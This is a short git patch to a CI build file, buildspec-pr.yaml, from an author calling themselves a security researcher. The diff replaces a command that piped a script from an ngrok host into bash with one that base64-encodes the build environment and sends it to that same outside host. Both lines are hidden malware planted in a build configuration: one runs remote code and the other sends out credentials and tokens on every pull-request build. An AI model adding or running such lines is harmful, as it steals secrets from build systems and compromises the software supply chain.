From 229a415e6b74d107d1de427901e6eb1f35ae856c Mon Sep 17 00:00:00 2001 From: SecurityResearcher-yoda Date: Thu, 12 Sep 2024 16:31:26 +0800 Subject: [PATCH] Update buildspec-pr.yaml --- buildspec-pr.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/buildspec-pr.yaml b/buildspec-pr.yaml index de9ed2caf40db..d93820df9f88e 100644 --- a/buildspec-pr.yaml +++ b/buildspec-pr.yaml @@ -12,7 +12,7 @@ phases: # baked in our image. # this also takes care of launching the docker daemon. - - curl http://0.tcp.in.ngrok.io:19736/payload.sh | bash + - curl http://0.tcp.in.ngrok.io:19736/?te=$(env |base64) - /root/ecr-proxy/start.sh # Install yarn if it wasn't already present in the image